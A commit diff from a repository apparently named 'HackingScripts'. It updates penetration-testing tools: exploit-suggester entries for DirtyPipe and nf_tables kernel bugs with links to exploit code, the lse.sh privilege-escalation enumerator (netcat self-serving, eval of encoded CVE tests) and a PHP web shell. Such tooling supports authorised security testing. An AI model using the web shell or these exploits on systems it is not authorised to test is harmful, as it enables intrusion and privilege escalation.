Roman/HackingScripts
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Project Update

Browse Source
This commit is contained in:
Roman Hergenreder 2022-12-05 10:09:01 +01:00
parent a86fff1b36
commit 80abe85b85
11 changed files with 2722 additions and 1573 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

5
crawl_urls.py
View File

@ -79,14 +79,15 @@ class Crawler:
self.queue.put(parts._replace(netloc=self.domain, scheme=self.scheme,fragment="").geturl()) self.queue.put(parts._replace(netloc=self.domain, scheme=self.scheme,fragment="").geturl())
def collect_urls(self, page): def collect_urls(self, page):
soup = BeautifulSoup(page, "html.parser") if not isinstance(page, BeautifulSoup):
page = BeautifulSoup(page, "html.parser")
urls = set() urls = set()
attrs = ["src","href","action"] attrs = ["src","href","action"]
tags = ["a","link","script","img","form"] tags = ["a","link","script","img","form"]
for tag in tags: for tag in tags:
for e in soup.find_all(tag): for e in page.find_all(tag):
for attr in attrs: for attr in attrs:
if e.has_attr(attr): if e.has_attr(attr):
urls.add(e[attr]) urls.add(e[attr])

3862
linpeas.sh
View File

File diff suppressed because one or more lines are too long

60
linux-exploit-suggester.sh
View File

@ -1,7 +1,7 @@
#!/bin/bash #!/bin/bash
# #
# Copyright (c) 2016-2020, @_mzet_ # Copyright (c) 2016-2022, @_mzet_
# #
# linux-exploit-suggester.sh comes with ABSOLUTELY NO WARRANTY. # linux-exploit-suggester.sh comes with ABSOLUTELY NO WARRANTY.
# This is free software, and you are welcome to redistribute it # This is free software, and you are welcome to redistribute it
@ -930,6 +930,44 @@ author: theflow (orginal exploit author); bcoles (author of exploit update at 'e
EOF EOF
) )
EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2022-0847]${txtrst} DirtyPipe
Reqs: pkg=linux-kernel,ver>=5.8,ver<=5.16.11
Tags: ubuntu=(20.04|21.04),debian=11
Rank: 1
analysis-url: https://dirtypipe.cm4all.com/
src-url: https://haxx.in/files/dirtypipez.c
exploit-db: 50808
author: blasty (original exploit author: Max Kellermann)
EOF
)
EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2022-2586]${txtrst} nft_object UAF
Reqs: pkg=linux-kernel,ver>=3.16,CONFIG_USER_NS=y,sysctl:kernel.unprivileged_userns_clone==1
Tags: ubuntu=(20.04){kernel:5.12.13}
Rank: 1
analysis-url: https://www.openwall.com/lists/oss-security/2022/08/29/5
src-url: https://www.openwall.com/lists/oss-security/2022/08/29/5/1
Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)
author: vulnerability discovery: Team Orca of Sea Security; Exploit author: Alejandro Guerrero
EOF
)
EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2022-32250]${txtrst} nft_object UAF (NFT_MSG_NEWSET)
Reqs: pkg=linux-kernel,ver<5.18.1,CONFIG_USER_NS=y,sysctl:kernel.unprivileged_userns_clone==1
Tags: ubuntu=(22.04){kernel:5.15.0-27-generic}
Rank: 1
analysis-url: https://research.nccgroup.com/2022/09/01/settlers-of-netlink-exploiting-a-limited-uaf-in-nf_tables-cve-2022-32250/
analysis-url: https://blog.theori.io/research/CVE-2022-32250-linux-kernel-lpe-2022/
src-url: https://raw.githubusercontent.com/theori-io/CVE-2022-32250-exploit/main/exp.c
Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)
author: vulnerability discovery: EDG Team from NCC Group; Author of this exploit: theori.io
EOF
)
############ USERSPACE EXPLOITS ########################### ############ USERSPACE EXPLOITS ###########################
n=0 n=0
@ -1769,7 +1807,7 @@ EOF
FEATURES[((n++))]=$(cat <<EOF FEATURES[((n++))]=$(cat <<EOF
feature: Syscalls filtering feature: Syscalls filtering
available: CONFIG_SECCOMP=y available: CONFIG_SECCOMP=y
enabled: cmd:grep -i Seccomp /proc/self/status | awk '{print \$2}' enabled: cmd:grep -iw Seccomp /proc/self/status | awk '{print \$2}'
analysis-url: https://github.com/mzet-/les-res/blob/master/features/bpf_syscall.md analysis-url: https://github.com/mzet-/les-res/blob/master/features/bpf_syscall.md
EOF EOF
) )
@ -2167,8 +2205,8 @@ for FEATURE in "${FEATURES[@]}"; do
feature=$(echo "$FEATURE" | grep "feature: " | cut -d' ' -f 2-) feature=$(echo "$FEATURE" | grep "feature: " | cut -d' ' -f 2-)
if [ -n "$cmdStdout" ]; then if [ -n "$cmdStdout" ]; then
if [ "$cmdStdout" -eq 0 ]; then if [ $cmdStdout -eq 0 ]; then
state="[ ${txtred}Set to $cmdStdout${txtrst} ]" state="[ ${txtred}Set to $cmdStdout${txtrst} ]"
cmdStdout="" cmdStdout=""
else else
@ -2181,15 +2219,15 @@ for FEATURE in "${FEATURES[@]}"; do
# for 3rd party (3) mode display "N/A" or "Enabled" # for 3rd party (3) mode display "N/A" or "Enabled"
if [ $MODE -eq 3 ]; then if [ $MODE -eq 3 ]; then
enabled="[ ${txtgrn}Enabled${txtrst} ]" enabled="[ ${txtgrn}Enabled${txtrst} ]"
disabled="[ ${txtgray}N/A${txtrst} ]" disabled="[ ${txtgray}N/A${txtrst} ]"
# for attack-surface (4) mode display "Locked" or "Exposed" # for attack-surface (4) mode display "Locked" or "Exposed"
elif [ $MODE -eq 4 ]; then elif [ $MODE -eq 4 ]; then
enabled="[ ${txtred}Exposed${txtrst} ]" enabled="[ ${txtred}Exposed${txtrst} ]"
disabled="[ ${txtgrn}Locked${txtrst} ]" disabled="[ ${txtgrn}Locked${txtrst} ]"
#other modes" "Disabled" / "Enabled" # other modes" "Disabled" / "Enabled"
else else
enabled="[ ${txtgrn}Enabled${txtrst} ]" enabled="[ ${txtgrn}Enabled${txtrst} ]"
disabled="[ ${txtred}Disabled${txtrst} ]" disabled="[ ${txtred}Disabled${txtrst} ]"

311
lse.sh
View File

@ -1,15 +1,15 @@
#!/bin/sh #!/bin/sh
# shellcheck disable=1003,1091,2006,2016,2034,2039 # shellcheck disable=1003,1091,2006,2016,2034,2039,3043
# vim: set ts=2 sw=2 sts=2 et: # vim: set ts=2 sw=2 sts=2 fdm=marker fmr=#(,#) et:
# Author: Diego Blanco <diego.blanco@treitos.com> # Author: Diego Blanco <diego.blanco@treitos.com>
# GitHub: https://github.com/diego-treitos/linux-smart-enumeration # GitHub: https://github.com/diego-treitos/linux-smart-enumeration
# #
lse_version="3.10" lse_version="4.10nw"
#( Colors ##( Colors
# #
# fg #( fg
red='\e[31m' red='\e[31m'
lred='\e[91m' lred='\e[91m'
green='\e[32m' green='\e[32m'
@ -26,8 +26,8 @@ grey='\e[90m'
lgrey='\e[37m' lgrey='\e[37m'
white='\e[97m' white='\e[97m'
black='\e[30m' black='\e[30m'
# ##)
# bg #( bg
b_red='\e[41m' b_red='\e[41m'
b_lred='\e[101m' b_lred='\e[101m'
b_green='\e[42m' b_green='\e[42m'
@ -44,8 +44,8 @@ b_grey='\e[100m'
b_lgrey='\e[47m' b_lgrey='\e[47m'
b_white='\e[107m' b_white='\e[107m'
b_black='\e[40m' b_black='\e[40m'
# ##)
# special #( special
reset='\e[0;0m' reset='\e[0;0m'
bold='\e[01m' bold='\e[01m'
italic='\e[03m' italic='\e[03m'
@ -59,13 +59,13 @@ underline_off='\e[24m'
inverse_off='\e[27m' inverse_off='\e[27m'
conceil_off='\e[28m' conceil_off='\e[28m'
crossedout_off='\e[29m' crossedout_off='\e[29m'
##)
#) #)
#( Globals ##( Globals
# #
# user # user
lse_user_id="$UID" lse_user_id="`id -u`"
[ -z "$lse_user_id" ] && lse_user_id="`id -u`"
lse_user="$USER" lse_user="$USER"
[ -z "$lse_user" ] && lse_user="`id -nu`" [ -z "$lse_user" ] && lse_user="`id -nu`"
lse_pass="" lse_pass=""
@ -77,7 +77,8 @@ lse_arch="`uname -m`"
lse_linux="`uname -r`" lse_linux="`uname -r`"
lse_hostname="`hostname`" lse_hostname="`hostname`"
lse_distro=`command -v lsb_release >/dev/null 2>&1 && lsb_release -d | sed 's/Description:\s*//' 2>/dev/null` lse_distro=`command -v lsb_release >/dev/null 2>&1 && lsb_release -d | sed 's/Description:\s*//' 2>/dev/null`
[ -z "$lse_distro" ] && lse_distro="`(source /etc/os-release && echo "$PRETTY_NAME")2>/dev/null`" [ -z "$lse_distro" ] && lse_distro="`(. /etc/os-release && echo "$PRETTY_NAME")2>/dev/null`"
lse_distro_codename="" # retrieved below with lse_get_distro_codename
# lse # lse
lse_passed_tests="" lse_passed_tests=""
@ -85,11 +86,12 @@ lse_executed_tests=""
lse_DEBUG=false lse_DEBUG=false
lse_procmon_data=`mktemp` lse_procmon_data=`mktemp`
lse_procmon_lock=`mktemp` lse_procmon_lock=`mktemp`
lse_cve_tmp=''
# printf # printf
printf "%s" "$reset" | grep -q '\\' && alias printf="env printf" printf "%s" "$reset" | grep -q '\\' && alias printf="env printf"
# internal data #( internal data
lse_common_setuid=" lse_common_setuid="
/bin/fusermount /bin/fusermount
/bin/mount /bin/mount
@ -176,12 +178,14 @@ lse_common_setuid="
/usr/sbin/usernetctl /usr/sbin/usernetctl
/usr/sbin/uuidd /usr/sbin/uuidd
" "
#regex rules for common setuid #)
#( regex rules for common setuid
lse_common_setuid="$lse_common_setuid lse_common_setuid="$lse_common_setuid
/snap/core.* /snap/core.*
/var/tmp/mkinitramfs.* /var/tmp/mkinitramfs.*
" "
#critical writable files #)
#( critical writable files
lse_critical_writable=" lse_critical_writable="
/etc/apache2/apache2.conf /etc/apache2/apache2.conf
/etc/apache2/httpd.conf /etc/apache2/httpd.conf
@ -235,8 +239,13 @@ lse_critical_writable_dirs="
/root /root
" "
#) #)
#( CVE list (populated by the lse packager)
lse_cve_list="
" #CVElistMARKER
#)
#)
#( Options ##( Options
lse_color=true lse_color=true
lse_alt_color=false lse_alt_color=false
lse_interactive=true lse_interactive=true
@ -247,16 +256,16 @@ lse_find_opts='-path /proc -prune -o -path /sys -prune -o -path /dev -prune -o'
lse_grep_opts='--color=always' lse_grep_opts='--color=always'
#) #)
#( Lib ##( Lib
cecho() { cecho() { #(
if $lse_color; then if $lse_color; then
printf "%b" "$@" printf "%b" "$@"
else else
# If color is disabled we remove it # If color is disabled we remove it
printf "%b" "$@" | sed 's/\x1B\[[0-9;]\+[A-Za-z]//g' printf "%b" "$@" | sed 's/\x1B\[[0-9;]\+[A-Za-z]//g'
fi fi
} } #)
lse_recolor() { lse_recolor() { #(
o_white="$white" o_white="$white"
o_lyellow="$lyellow" o_lyellow="$lyellow"
o_grey="$grey" o_grey="$grey"
@ -270,11 +279,11 @@ lse_recolor() {
lred="$red" lred="$red"
lgreen="$b_lgreen$black" lgreen="$b_lgreen$black"
lcyan="$cyan" lcyan="$cyan"
} } #)
lse_error() { lse_error() { #(
cecho "${red}ERROR: ${reset}$*\n" >&2 cecho "${red}ERROR: ${reset}$*\n" >&2
} } #)
lse_exclude_paths() { lse_exclude_paths() { #(
local IFS=" local IFS="
" "
for p in `printf "%s" "$1" | tr ',' '\n'`; do for p in `printf "%s" "$1" | tr ',' '\n'`; do
@ -282,8 +291,8 @@ lse_exclude_paths() {
p="${p%%/}" p="${p%%/}"
lse_find_opts="$lse_find_opts -path ${p} -prune -o" lse_find_opts="$lse_find_opts -path ${p} -prune -o"
done done
} } #)
lse_set_level() { lse_set_level() { #(
case "$1" in case "$1" in
0|1|2) 0|1|2)
lse_level=$(($1)) lse_level=$(($1))
@ -293,8 +302,8 @@ lse_set_level() {
exit 1 exit 1
;; ;;
esac esac
} } #)
lse_help() { lse_help() { #(
echo "Use: $0 [options]" echo "Use: $0 [options]"
echo echo
echo " OPTIONS" echo " OPTIONS"
@ -319,6 +328,7 @@ lse_help() {
echo " pro: Processes related tests." echo " pro: Processes related tests."
echo " sof: Software related tests." echo " sof: Software related tests."
echo " ctn: Container (docker, lxc) related tests." echo " ctn: Container (docker, lxc) related tests."
echo " cve: CVE related tests."
echo " Specific tests can be used with their IDs (i.e.: usr020,sud)" echo " Specific tests can be used with their IDs (i.e.: usr020,sud)"
echo " -e PATHS Comma separated list of paths to exclude. This allows you" echo " -e PATHS Comma separated list of paths to exclude. This allows you"
echo " to do faster scans at the cost of completeness" echo " to do faster scans at the cost of completeness"
@ -326,8 +336,8 @@ lse_help() {
echo " processes. A value of 0 will disable any watch (default: 60)" echo " processes. A value of 0 will disable any watch (default: 60)"
echo " -S Serve the lse.sh script in this host so it can be retrieved" echo " -S Serve the lse.sh script in this host so it can be retrieved"
echo " from a remote host." echo " from a remote host."
} } #)
lse_ask() { lse_ask() { #(
local question="$1" local question="$1"
# We use stderr to print the question # We use stderr to print the question
cecho "${white}${question}: ${reset}" >&2 cecho "${white}${question}: ${reset}" >&2
@ -341,24 +351,24 @@ lse_ask() {
return 1 return 1
;; ;;
esac esac
} } #)
lse_request_information() { lse_request_information() { #(
if $lse_interactive; then if $lse_interactive; then
cecho "${grey}---\n" cecho "${grey}---\n"
[ -z "$lse_user" ] && lse_user=`lse_ask "Could not find current user name. Current user?"` [ -z "$lse_user" ] && lse_user=`lse_ask "Could not find current user name. Current user?"`
lse_pass=`lse_ask "If you know the current user password, write it here to check sudo privileges"` lse_pass=`lse_ask "If you know the current user password, write it here to check sudo privileges"`
cecho "${grey}---\n" cecho "${grey}---\n"
fi fi
} } #)
lse_test_passed() { lse_test_passed() { #(
# Checks if a test passed by ID # Checks if a test passed by ID
local id="$1" local id="$1"
for i in $lse_passed_tests; do for i in $lse_passed_tests; do
[ "$i" = "$id" ] && return 0 [ "$i" = "$id" ] && return 0
done done
return 1 return 1
} } #)
lse_test() { lse_test() { #(
# Test id # Test id
local id="$1" local id="$1"
# Minimum level required for this test to show its output # Minimum level required for this test to show its output
@ -394,8 +404,8 @@ lse_test() {
# Print name and line # Print name and line
cecho "${white}[${l}${white}] ${grey}${id}${white} $name${grey}" cecho "${white}[${l}${white}] ${grey}${id}${white} $name${grey}"
for i in $(seq $((${#name}+4)) 67); do for i in $(seq $((${#id}+${#name}+10)) 79); do
echo -n "." printf "."
done done
# Check dependencies # Check dependencies
@ -445,8 +455,8 @@ lse_test() {
fi fi
return 0 return 0
fi fi
} } #)
lse_show_info() { lse_show_info() { #(
echo echo
cecho "${lcyan} LSE Version:${reset} $lse_version\n" cecho "${lcyan} LSE Version:${reset} $lse_version\n"
echo echo
@ -470,12 +480,14 @@ lse_show_info() {
fi fi
cecho "${lblue}Architecture:${reset} $lse_arch\n" cecho "${lblue}Architecture:${reset} $lse_arch\n"
echo echo
} cecho "${green}=====================(${yellow} Current Output Verbosity Level: ${cyan}$lse_level ${green})======================${reset}"
lse_serve() { echo
} #)
lse_serve() { #(
# get port # get port
which nc >/dev/null || lse_error "Could not find 'nc' netcat binary." which nc >/dev/null || lse_error "Could not find 'nc' netcat binary."
local_ips="`ip a | grep -Eo 'inet ([0-9]{1,3}\.){3}[0-9]{1,3}' | cut -d' ' -f2`" local_ips="`ip a | grep -Eo "inet ([0-9]{1,3}\.){3}[0-9]{1,3}" | cut -d' ' -f2`"
# Get a valid and non used port # Get a valid and non used port
port=`od -An -N2 -i /dev/random|grep -Eo '[0-9]+'` port=`od -An -N2 -i /dev/random|grep -Eo '[0-9]+'`
@ -506,8 +518,8 @@ lse_serve() {
done done
# try nc with '-N' (openbsd), then ncat and then use '-q0' (traditional) # try nc with '-N' (openbsd), then ncat and then use '-q0' (traditional)
nc -l -N -p "$port" < "$0" >/dev/null 2>/dev/null || nc -l --send-only -p "$port" < "$0" >/dev/null 2>/dev/null || nc -l -q0 -p "$port" < "$0" >/dev/null nc -l -N -p "$port" < "$0" >/dev/null 2>/dev/null || nc -l --send-only -p "$port" < "$0" >/dev/null 2>/dev/null || nc -l -q0 -p "$port" < "$0" >/dev/null
} } #)
lse_header() { lse_header() { #(
local id="$1" local id="$1"
shift shift
local title="$*" local title="$*"
@ -530,8 +542,8 @@ lse_header() {
done done
text="$text(${green} $title ${magenta})=====" text="$text(${green} $title ${magenta})====="
cecho "$text${reset}\n" cecho "$text${reset}\n"
} } #)
lse_exit() { lse_exit() { #(
local ec=1 local ec=1
local text="\n${magenta}==================================" local text="\n${magenta}=================================="
[ "$1" ] && ec=$1 [ "$1" ] && ec=$1
@ -539,18 +551,32 @@ lse_exit() {
cecho "$text${reset}\n" cecho "$text${reset}\n"
rm -f "$lse_procmon_data" rm -f "$lse_procmon_data"
rm -f "$lse_procmon_lock" rm -f "$lse_procmon_lock"
rm -f "$lse_cve_tmp"
exit "$ec" exit "$ec"
} } #)
lse_procmon() { lse_procmon() { #(
# monitor processes # monitor processes
#NOTE: The first number will be the number of occurrences of a process due to #NOTE: The first number will be the number of occurrences of a process due to
# uniq -c # uniq -c
local ps_args
local ps_busybox
if ps -V 2>&1 | grep -iq busybox; then
ps_args='-o pid,user,args'
ps_busybox=true
else
ps_args="-ewwwo start_time,pid,user:50,args"
ps_busybox=false
fi
while [ -f "$lse_procmon_lock" ]; do while [ -f "$lse_procmon_lock" ]; do
ps -ewwwo start_time,pid,user:50,args if $ps_busybox; then
ps $ps_args | sed 's/^\([0-9]*\)/? \1 /g'
else
ps $ps_args
fi
sleep 0.001 sleep 0.001
done | grep -v 'ewwwo start_time,pid,user:50,args' | sed 's/^ *//g' | tr -s '[:space:]' | grep -v "^START" | grep -Ev '[^ ]+ [^ ]+ [^ ]+ \[' | sort -Mr | uniq -c | sed 's/^ *//g' > "$lse_procmon_data" done | grep -Ev "(pid,user|$lse_user *sed s/)" | sed 's/^ *//g' | tr -s '[:space:]' | grep -Ev "PID *USER *COMMAND" | grep -Ev '[^ ]+ [^ ]+ [^ ]+ \[' | sort -Mr | uniq -c | sed 's/^ *//g' > "$lse_procmon_data"
} } #)
lse_proc_print() { lse_proc_print() { #(
# Pretty prints output from lse_procmom received via stdin # Pretty prints output from lse_procmom received via stdin
if $lse_color; then if $lse_color; then
printf "${green}%s %8s %8s %s\n" "START" "PID" "USER" "COMMAND" printf "${green}%s %8s %8s %s\n" "START" "PID" "USER" "COMMAND"
@ -574,7 +600,57 @@ lse_proc_print() {
printf "%s %8s %8s %s\n" "$p_time" "$p_pid" "$p_user" "$p_args" printf "%s %8s %8s %s\n" "$p_time" "$p_pid" "$p_user" "$p_args"
fi fi
done done
} } #)
lse_get_distro_codename() { #(
# Get the distribution name
#
# ubuntu, debian, centos, redhat, opsuse, fedora, rocky
local distro="${grey}unknown${reset}"
if type lsb_release >/dev/null 2>&1; then
distro=`lsb_release -is`
elif [ -f /etc/os-release ]; then
distro=`grep -E '^ID=' /etc/os-release | cut -f2 -d=`
echo "$distro" | grep -qi opensuse && distro=opsuse
elif [ -f /etc/redhat-release ]; then
grep -qi "centos" /etc/redhat-release && distro=centos
grep -qi "fedora" /etc/redhat-release && distro=fedora
grep -qi "red hat" /etc/redhat-release && distro=redhat
grep -qi "rocky" /etc/redhat-release && distro=rocky
fi
printf '%s' "$distro" | tr '[:upper:]' '[:lower:]' | tr -d \"\'
} #)
lse_is_version_bigger() { #(
# check if version v1 is bigger than v2
local v1="$1"; local v2="$2" ; local vc
[ "$v1" = "$v2" ] && return 1 # equal is not bigger
vc="`printf "%s\n%s\n" "$v1" "$v2" | sort -rV | head -n1`"
[ "$v1" = "$vc" ] && return 0
return 1
} #)
lse_get_pkg_version() { #(
# get package version depending on distro
# returns 2 if distro is unknown
# returns 1 if package is not installed (or doesn't exist)
# returns 0 on success, and prints out the package version
pkg_name="$1"
case "$lse_distro_codename" in
debian|ubuntu)
pkg_version=`dpkg -l "$pkg_name" 2>/dev/null | grep -E '^ii' | tr -s ' ' | cut -d' ' -f3`
;;
centos|redhat|fedora|opsuse|rocky|amzn)
pkg_version=`rpm -q "$pkg_name" 2>/dev/null`
pkg_version="${pkg_version##"$pkg_name"-}"
pkg_version=`echo "$pkg_version" | sed -E 's/\.(aarch64|armv7hl|i686|noarch|ppc64le|s390x|x86_64)$//'`
;;
*)
return 2
;;
esac
[ -z "$pkg_version" ] && return 1
printf "%s" "$pkg_version"
return 0
} #)
#)
#) #)
########################################################################( TESTS ########################################################################( TESTS
@ -638,7 +714,7 @@ lse_run_tests_users() {
'for ep in $lse_exec_paths; do [ "$ep" = "." ] && grep -ER "^ *PATH=.*" /etc/ 2> /dev/null | tr -d \"\'"'"' | grep -E "[=:]\.([:[:space:]]|\$)";done' \ 'for ep in $lse_exec_paths; do [ "$ep" = "." ] && grep -ER "^ *PATH=.*" /etc/ 2> /dev/null | tr -d \"\'"'"' | grep -E "[=:]\.([:[:space:]]|\$)";done' \
"usr070" "usr070"
} }
#)
#########################################################################( sudo #########################################################################( sudo
lse_run_tests_sudo() { lse_run_tests_sudo() {
@ -688,7 +764,7 @@ lse_run_tests_sudo() {
"Do we know if any other users used sudo?" \ "Do we know if any other users used sudo?" \
'for uh in $(cut -d: -f1,6 /etc/passwd); do [ -f "${uh##*:}/.sudo_as_admin_successful" ] && echo "${uh%%:*}"; done' 'for uh in $(cut -d: -f1,6 /etc/passwd); do [ -f "${uh##*:}/.sudo_as_admin_successful" ] && echo "${uh%%:*}"; done'
} }
#)
##################################################################( file system ##################################################################( file system
lse_run_tests_filesystem() { lse_run_tests_filesystem() {
@ -851,7 +927,7 @@ lse_run_tests_filesystem() {
"Dump fstab file" \ "Dump fstab file" \
'cat /etc/fstab' 'cat /etc/fstab'
} }
#)
#######################################################################( system #######################################################################( system
lse_run_tests_system() { lse_run_tests_system() {
@ -907,7 +983,7 @@ lse_run_tests_system() {
"System password policies in /etc/login.defs" \ "System password policies in /etc/login.defs" \
'grep "^PASS_MAX_DAYS\|^PASS_MIN_DAYS\|^PASS_WARN_AGE\|^ENCRYPT_METHOD" /etc/login.defs' 'grep "^PASS_MAX_DAYS\|^PASS_MIN_DAYS\|^PASS_WARN_AGE\|^ENCRYPT_METHOD" /etc/login.defs'
} }
#)
#####################################################################( security #####################################################################( security
lse_run_tests_security() { lse_run_tests_security() {
@ -953,7 +1029,7 @@ lse_run_tests_security() {
"Can we read the auditd log?" \ "Can we read the auditd log?" \
'al=/var/log/audit/audit.log; test -r "$al" && echo "tail $al:" && echo && tail "$al"' 'al=/var/log/audit/audit.log; test -r "$al" && echo "tail $al:" && echo && tail "$al"'
} }
#)
##############################################################( recurrent tasks ##############################################################( recurrent tasks
lse_run_tests_recurrent_tasks() { lse_run_tests_recurrent_tasks() {
@ -1021,7 +1097,7 @@ lse_run_tests_recurrent_tasks() {
"Systemd timers" \ "Systemd timers" \
'systemctl list-timers --all' 'systemctl list-timers --all'
} }
#)
######################################################################( network ######################################################################( network
lse_run_tests_network() { lse_run_tests_network() {
@ -1072,7 +1148,7 @@ lse_run_tests_network() {
"Listening UDP" \ "Listening UDP" \
'netstat -unlp || ss -unlp' 'netstat -unlp || ss -unlp'
} }
#)
#####################################################################( services #####################################################################( services
lse_run_tests_services() { lse_run_tests_services() {
@ -1167,7 +1243,7 @@ lse_run_tests_services() {
"Systemd config files permissions" \ "Systemd config files permissions" \
'ls -lthR /lib/systemd/ /etc/systemd/' 'ls -lthR /lib/systemd/ /etc/systemd/'
} }
#)
#####################################################################( software #####################################################################( software
lse_run_tests_software() { lse_run_tests_software() {
@ -1310,7 +1386,7 @@ lse_run_tests_software() {
'screen -v' 'screen -v'
} }
#)
###################################################################( containers ###################################################################( containers
lse_run_tests_containers() { lse_run_tests_containers() {
@ -1341,7 +1417,7 @@ lse_run_tests_containers() {
"Is the user a member of any lxc/lxd group?" \ "Is the user a member of any lxc/lxd group?" \
'groups | grep $lse_grep_opts "lxc\|lxd"' 'groups | grep $lse_grep_opts "lxc\|lxd"'
} }
#)
####################################################################( processes ####################################################################( processes
lse_run_tests_processes() { lse_run_tests_processes() {
@ -1398,49 +1474,84 @@ lse_run_tests_processes() {
'printf "%s\n" "$lse_proc_bin" | xargs ls -l' \ 'printf "%s\n" "$lse_proc_bin" | xargs ls -l' \
"pro001" "pro001"
} }
#)
#########################################################################( CVEs
lse_run_tests_cves() {
lse_header "cve" "CVEs"
if [ "${#lse_cve_list}" = 1 ]; then
if [ -z "$lse_selection" ] || printf "%s" "$lse_selection" | grep -iq 'cve'; then
printf "%s\n%s\n%s" \
" In order to test for CVEs, download lse.sh from the GitHub releases page." \
" Alternatively, build lse_cve.sh using tools/package_cvs_into_lse.sh from the" \
" repository."
fi
else
for lse_cve in $lse_cve_list; do
eval "$(printf '%s' "$lse_cve" | base64 -d | gunzip -c)"
lse_test "$lse_cve_id" "$lse_cve_level" \
"$lse_cve_description" \
"lse_cve_test"
done
fi
}
#)
# #
##) ##)
#( Main #( Main
while getopts "hcCil:e:p:s:S" option; do main() {
case "${option}" in while getopts "hcCil:e:p:s:S" option; do
c) lse_color=false; lse_grep_opts='--color=never';; case "${option}" in
C) lse_alt_color=true;; c) lse_color=false; lse_grep_opts='--color=never';;
e) lse_exclude_paths "${OPTARG}";; C) lse_alt_color=true;;
i) lse_interactive=false;; e) lse_exclude_paths "${OPTARG}";;
l) lse_set_level "${OPTARG}";; i) lse_interactive=false;;
s) lse_selection="`printf \"%s\" \"${OPTARG}\"|sed 's/,/ /g'`";; l) lse_set_level "${OPTARG}";;
p) lse_proc_time="${OPTARG}";; s) lse_selection="`printf \"%s\" \"${OPTARG}\"|sed 's/,/ /g'`";;
S) lse_serve; exit $?;; p) lse_proc_time="${OPTARG}";;
h) lse_help; exit 0;; S) lse_serve; exit $?;;
*) lse_help; exit 1;; h) lse_help; exit 0;;
esac *) lse_help; exit 1;;
done esac
done
#trap to exec on SIGINT #trap to exec on SIGINT
trap "lse_exit 1" 2 trap "lse_exit 1" 2
# use alternative color scheme # use alternative color scheme
$lse_alt_color && lse_recolor $lse_alt_color && lse_recolor
lse_request_information lse_request_information
lse_show_info lse_show_info
PATH="$PATH:/sbin:/usr/sbin" #fix path just in case PATH="$PATH:/sbin:/usr/sbin" #fix path just in case
lse_distro_codename=`lse_get_distro_codename`
lse_procmon & lse_procmon &
(sleep "$lse_proc_time"; rm -f "$lse_procmon_lock") & (sleep "$lse_proc_time"; rm -f "$lse_procmon_lock") &
lse_run_tests_users ## NO WAR
lse_run_tests_sudo lse_header "nowar" "humanity"
lse_run_tests_filesystem lse_test "nowar0" "0" \
lse_run_tests_system 'Should we question autocrats and their "military operations"?' \
lse_run_tests_security 'cecho " $black$b_blue NO $reset\n $black$b_yellow WAR $reset"'
lse_run_tests_recurrent_tasks
lse_run_tests_network
lse_run_tests_services
lse_run_tests_software
lse_run_tests_containers
lse_run_tests_processes
lse_exit 0 lse_run_tests_users
lse_run_tests_sudo
lse_run_tests_filesystem
lse_run_tests_system
lse_run_tests_security
lse_run_tests_recurrent_tasks
lse_run_tests_network
lse_run_tests_services
lse_run_tests_software
lse_run_tests_containers
lse_run_tests_processes
lse_run_tests_cves
lse_exit 0
}
[ ! "$lse_NO_EXEC" ] && main "$@"
#) #)

14
p0wny-shell.php
View File

@ -1,14 +1,22 @@
<?php <?php
function expandPath($path) {
if (preg_match("#^(~[a-zA-Z0-9_.-]*)(/.*)?$#", $path, $match)) {
exec("echo $match[1]", $stdout);
return $stdout[0] . $match[2];
}
return $path;
}
function featureShell($cmd, $cwd) { function featureShell($cmd, $cwd) {
$stdout = array(); $stdout = array();
if (preg_match("/^\s*cd\s*$/", $cmd)) { if (preg_match("/^\s*cd\s*(2>&1)?$/", $cmd)) {
// pass chdir(expandPath("~"));
} elseif (preg_match("/^\s*cd\s+(.+)\s*(2>&1)?$/", $cmd)) { } elseif (preg_match("/^\s*cd\s+(.+)\s*(2>&1)?$/", $cmd)) {
chdir($cwd); chdir($cwd);
preg_match("/^\s*cd\s+([^\s]+)\s*(2>&1)?$/", $cmd, $match); preg_match("/^\s*cd\s+([^\s]+)\s*(2>&1)?$/", $cmd, $match);
chdir($match[1]); chdir(expandPath($match[1]));
} elseif (preg_match("/^\s*download\s+[^\s]+\s*(2>&1)?$/", $cmd)) { } elseif (preg_match("/^\s*download\s+[^\s]+\s*(2>&1)?$/", $cmd)) {
chdir($cwd); chdir($cwd);
preg_match("/^\s*download\s+([^\s]+)\s*(2>&1)?$/", $cmd, $match); preg_match("/^\s*download\s+([^\s]+)\s*(2>&1)?$/", $cmd, $match);

3
web_service_finder.py
View File

@ -8,6 +8,7 @@ import requests
import urllib.parse import urllib.parse
import util import util
from bs4 import BeautifulSoup from bs4 import BeautifulSoup
from crawl_urls import Crawler
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning) requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
@ -208,7 +209,7 @@ class WebServiceFinder:
litecart_pattern = re.compile(r"^https://www.litecart.net") litecart_pattern = re.compile(r"^https://www.litecart.net")
wordpress_pattern = re.compile(r"/wp-(admin|includes|content)/(([^/]+)/)*(wp-emoji-release.min.js|style.min.css)\?ver=([0-9.]+)(&|$)") wordpress_pattern = re.compile(r"/wp-(admin|includes|content)/(([^/]+)/)*(wp-emoji-release.min.js|style.min.css)\?ver=([0-9.]+)(&|$)")
urls = util.collectUrls(soup) urls = Crawler(self.url).collect_urls(soup)
for url in urls: for url in urls:
self.printMatch("Moodle", moodle_pattern_1.search(url), version_func=lambda v: self.retrieveMoodleVersion(int(v))) self.printMatch("Moodle", moodle_pattern_1.search(url), version_func=lambda v: self.retrieveMoodleVersion(int(v)))
self.printMatch("Moodle", moodle_pattern_2.search(url), version_func=lambda v: "%d.%d" % (int(v)//10,int(v)%10)) self.printMatch("Moodle", moodle_pattern_2.search(url), version_func=lambda v: "%d.%d" % (int(v)//10,int(v)%10))

BIN
win/accesschk.exe
View File

Binary file not shown.

BIN
win/accesschk64.exe
View File

Binary file not shown.

36
win/winPEAS.bat
View File

@ -55,7 +55,7 @@ ECHO.
